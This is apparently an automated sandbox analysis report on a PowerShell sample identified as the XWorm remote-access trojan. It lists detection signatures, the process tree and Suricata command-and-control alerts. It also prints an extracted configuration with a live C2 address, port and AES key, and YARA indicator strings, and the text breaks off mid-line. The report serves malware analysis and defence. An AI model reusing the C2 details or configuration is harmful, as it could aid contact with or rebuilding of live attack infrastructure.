Windows Analysis Report
176.113.115_1.170.ps1

Overview

General Information

Sample name: 176.113.115_1.170.ps1
Analysis ID: 1583224
MD5: f344736e53d49acd78e0f3581a3a213c
SHA1: b11cb5e95986ff251bede9754b78180b4a975ec7
SHA256: 3688c90e2c14026dc323b4ae1b79d4c1aead3834d883d5bcd6815971e762b88b
Tags: 176-113-115-170, booking, ps1, SPAM-ITA, user-JAMESWT_MHT

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses ipconfig to lookup or modify the Windows network settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 2144 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115_1.170.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ipconfig.exe (PID: 7220 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 62F170FB07FDBB79CEB7147101406EB8)
    • RegSvcs.exe (PID: 7336 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • WerFault.exe (PID: 6000 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 1420 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": ["176.113.115.170"], "Port": 4412, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source | Rule | Description | Author
0000000A.00000002.3659100760.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0000000A.00000002.3659100760.0000000000402000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xad54:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xadf1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xaf06:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xaade:$cnc4: POST / HTTP/1.1
0000000A.00000002.3662994755.00000000031F1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x34f474:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x34f511:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x34f626:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x34f1fe:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author
0.2.powershell.exe.24a90f10d10.3.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.powershell.exe.24a90f10d10.3.unpack | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  • 0x7241:$str01: $VB$Local_Port
  • 0x7265:$str02: $VB$Local_Host
  • 0x5e28:$str03: get_Jpeg
  • 0x61d9:$str04: get_ServicePack
  • 0x810a:$str05: Select * from AntivirusProduct
  • 0x87ca:$str06: PCRestart
  • 0x87de:$str07: shutdown.exe /f /r /t 0
  • 0x8890:$str08: StopReport
  • 0x8866:$str09: StopDDos
  • 0x895c:$str10: sendPlugin
  • 0x89dc:$str11: OfflineKeylogger Not Enabled
  • 0x8b34:$str12: -ExecutionPolicy Bypass -File "
  • 0x8fc3:$str13: Content-length: 5235
0.2.powershell.exe.24a90f10d10.3.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x9154:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x91f1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x9306:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8ede:$cnc4: POST / HTTP/1.1
0.2.powershell.exe.24a91d29520.4.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.powershell.exe.24a91d29520.4.unpack | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  • 0x7241:$str01: $VB$Local_Port
  • 0x7265:$str02: $VB$Local_Host
  • 0x5e28:$str03: get_Jpeg
  • 0x61d9:$str04: get_ServicePack
  • 0x810a:$str05: Select * from AntivirusProduct
  • 0x87ca:$str06: PCRestart
  • 0x87de:$str07: shutdown.exe /f /r /t 0
  • 0x8890:$str08: StopReport
  • 0x8866:$str09: StopDDos
  • 0x895c:$str10: sendPlugin
  • 0x89dc:$str11: OfflineKeylogger Not Enabled
  • 0x8b34:$str12: -ExecutionPolicy Bypass -File "
  • 0x8fc3:$str13: Content-length: 5235

System Summary

Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115_1.170.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115_1.170.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115_1.170.ps1", ProcessId: 2144, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115_1.170.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115_1.170.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115_1.170.ps1", ProcessId: 2144, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-02T09:00:32.009335+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:00:45.033565+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:00:45.212244+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:00:58.346915+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:01:12.144899+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:01:16.458355+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:01:25.423889+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:01:38.720601+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:01:42.283356+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:01:42.440244+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:01:45.144874+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:01:47.689514+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:01:59.597231+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:01:59.719687+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:02:05.408598+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:02:05.530671+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:02:05.656172+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:02:05.777918+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:02:05.899222+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:02:11.127964+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:02:15.148726+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:02:17.643130+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:02:19.299011+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:02:28.080337+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:02:33.299246+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:02:33.421388+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:02:42.768580+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:02:45.159706+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:02:46.975079+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:02:50.869745+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:02:51.380265+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:03:04.675210+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:03:13.377895+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:03:15.176040+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:03:18.613472+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:03:24.005880+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:03:29.143839+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:03:29.267647+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:03:35.330845+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:03:45.324246+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
2025-01-02T09:04:03.077628+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-02T09:00:32.629988+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:00:45.035633+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:00:58.421438+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:01:12.146485+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:01:25.426143+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:01:38.723135+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:01:42.284903+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:01:42.441654+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:01:47.691509+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:01:59.600161+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:01:59.721156+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:01:59.844101+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:02:05.410728+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:02:05.532098+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:02:05.657495+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:02:05.779347+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:02:05.900522+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:02:11.129551+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:02:17.645317+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:02:19.300975+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:02:28.085409+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:02:33.303708+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:02:33.422984+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:02:33.547281+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:02:33.552193+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:02:42.770698+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:02:47.006775+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:02:50.871844+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:02:51.386752+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:02:51.544922+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:03:04.676686+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:03:13.379924+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:03:18.615397+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:03:24.007936+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:03:29.145691+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:03:29.269217+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
2025-01-02T09:03:35.332634+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-02T09:00:45.212244+0100 | 2858801 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-02T09:02:05.194685+0100 | 2858799 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP

AV Detection

Source: 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["176.113.115.170"], "Port": 4412, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: 176.113.115_1.170.ps1 Virustotal: Detection: 18%
Source: 176.113.115_1.170.ps1 ReversingLabs: Detection: 13%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmp String decryptor: 176.113.115.170
Source: 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmp String decryptor: 4412
Source: 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmp String decryptor: P0WER
Source: 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmp String decryptor: <Xwormmm>
Source: 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmp String decryptor: XWorm
Source: 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmp String decryptor: USB.exe
Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbW source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 0000000A.00000002.3682055554.0000000005A2B000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdbi source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Xml.ni.pdb source: WERACBB.tmp.dmp.18.dr
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.ni.pdbRSDS source: WERACBB.tmp.dmp.18.dr
Source: Binary string: System.Management.pdbx source: WERACBB.tmp.dmp.18.dr
Source: Binary string: @[o.pdbsw source: RegSvcs.exe, 0000000A.00000002.3682055554.0000000005A2B000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb4 source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDBsg] source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb89O source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1341539656.0000024A90AB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.1341599146.0000024A90D37000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WERACBB.tmp.dmp.18.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WERACBB.tmp.dmp.18.dr
Source: Binary string: Microsoft.VisualBasic.pdbH source: WERACBB.tmp.dmp.18.dr
Source: Binary string: System.Configuration.pdb source: WERACBB.tmp.dmp.18.dr
Source: Binary string: System.Xml.pdb source: WERACBB.tmp.dmp.18.dr
Source: Binary string: System.pdb source: WERACBB.tmp.dmp.18.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WERACBB.tmp.dmp.18.dr
Source: Binary string: System.Core.ni.pdb source: WERACBB.tmp.dmp.18.dr
Source: Binary string: Microsoft.VisualBasic.pdb source: WERACBB.tmp.dmp.18.dr
Source: Binary string: System.Xml.pdbO source: WERACBB.tmp.dmp.18.dr
Source: Binary string: System.Windows.Forms.pdb source: WERACBB.tmp.dmp.18.dr
Source: Binary string: mscorlib.pdb source: RegSvcs.exe, 0000000A.00000002.3683262361.0000000006B28000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp, WERACBB.tmp.dmp.18.dr
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERACBB.tmp.dmp.18.dr
Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32x source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Drawing.pdb source: WERACBB.tmp.dmp.18.dr
Source: Binary string: System.Management.pdb source: WERACBB.tmp.dmp.18.dr
Source: Binary string: mscorlib.ni.pdb source: WERACBB.tmp.dmp.18.dr
Source: Binary string: \??\C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 0000000A.00000002.3659546124.000000000153C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.ni.pdb source: WERACBB.tmp.dmp.18.dr
Source: Binary string: \??\C:\Windows\mscorlib.pdb-SJ source: RegSvcs.exe, 0000000A.00000002.3659546124.000000000153C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: WERACBB.tmp.dmp.18.dr
Source: Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdbX source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: symbols\dll\mscorlib.pdbLb source: RegSvcs.exe, 0000000A.00000002.3682055554.0000000005A2B000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: HPOo0C:\Windows\mscorlib.pdb source: RegSvcs.exe, 0000000A.00000002.3682055554.0000000005A2B000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\RegSvcs.pdb source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ?[oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbD source: RegSvcs.exe, 0000000A.00000002.3682055554.0000000005A2B000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb s source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERACBB.tmp.dmp.18.dr
Source: Binary string: System.ni.pdb source: WERACBB.tmp.dmp.18.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERACBB.tmp.dmp.18.dr
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
